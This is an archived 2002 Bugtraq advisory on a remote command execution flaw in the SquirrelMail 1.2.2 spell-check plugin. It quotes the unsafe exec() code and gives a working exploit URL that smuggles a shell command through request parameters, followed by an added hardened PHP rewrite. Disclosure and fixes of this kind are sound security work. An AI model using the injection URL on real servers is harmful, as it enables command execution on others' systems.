[23969] in bugtraq


squirrelmail bug

daemon@ATHENA.MIT.EDU (appelast@bsquad.sm.pl)
Thu Jan 24 13:58:41 2002

Message-ID: <1176.213.134.140.130.1011887757.squirrel@mail.bsquad.sm.pl>
Date: Thu, 24 Jan 2002 16:55:57 +0100 (CET)
From: <appelast@bsquad.sm.pl>
To: bugtraq@securityfocus.com
Cc: squirrelmail-pl@maciejka.net
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


SquirrelMail remote command execution bug

Version Affected :
1.2.2

SquirrelMail is a webmail system that lets users send, receive and read
mail. It supports themes and plugins. One of the plugins contains a very
interesting piece of code:

From the file check_me.mod.php:

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt";
...
exec ("cat $floc | $sqspell_command", $sqspell_output);


Everything would be fine, but where does this page include the config
files that define $attachment_dir and the others? Answer: nowhere. We can
therefore set the variables $sqspell_command and $floc ourselves. The
result? We can execute any command, with the privileges of the HTTP server
owner, of course.

Exploit :

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

<appelast@bsquad.sm.pl>
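
A hardened form of the quoted logic, as an added example that is not part of the original post and is not SquirrelMail's own code. The constants, the function name, the data file naming and the /bin/cat stand-in for a spell checker are assumptions; it needs PHP 7.4 or later for the array form of proc_open.

```php
<?php
// Added example, not SquirrelMail code. All names here are hypothetical.
// Server-side configuration: defined in code, never taken from the request.
const ATTACHMENT_DIR = '/tmp';               // constructed sample value
const SPELL_APPS = [
    // argv arrays, not shell strings; /bin/cat stands in for a spell checker
    'English' => ['/bin/cat'],
];

function run_spell_check(string $appKey, string $username): array
{
    // The request may only select a key from the allowlist.
    if (!array_key_exists($appKey, SPELL_APPS)) {
        throw new InvalidArgumentException('unknown spell checker');
    }
    // The user name becomes part of a file name: allow a narrow character
    // set with no slash and no leading dot, so it stays one path component.
    if (!preg_match('/^[A-Za-z0-9_@-][A-Za-z0-9._@-]{0,63}$/', $username)) {
        throw new InvalidArgumentException('invalid user name');
    }
    $floc = ATTACHMENT_DIR . '/' . $username . '_sqspell_data.txt';
    if (!is_file($floc)) {
        throw new RuntimeException('no data file for user');
    }
    // An argv array starts the process without a shell, and the data file is
    // attached as stdin instead of being piped through "cat".
    $spec = [
        0 => ['file', $floc, 'r'],
        1 => ['pipe', 'w'],
        2 => ['file', '/dev/null', 'w'],
    ];
    $proc = proc_open(SPELL_APPS[$appKey], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start spell checker');
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return explode("\n", rtrim($output, "\n"));
}

// Demo with constructed input.
file_put_contents(ATTACHMENT_DIR . '/alice_sqspell_data.txt', "helo wrld\n");
print_r(run_spell_check('English', 'alice'));
try {
    run_spell_check('blah', 'alice');        // key is not in the allowlist
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```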


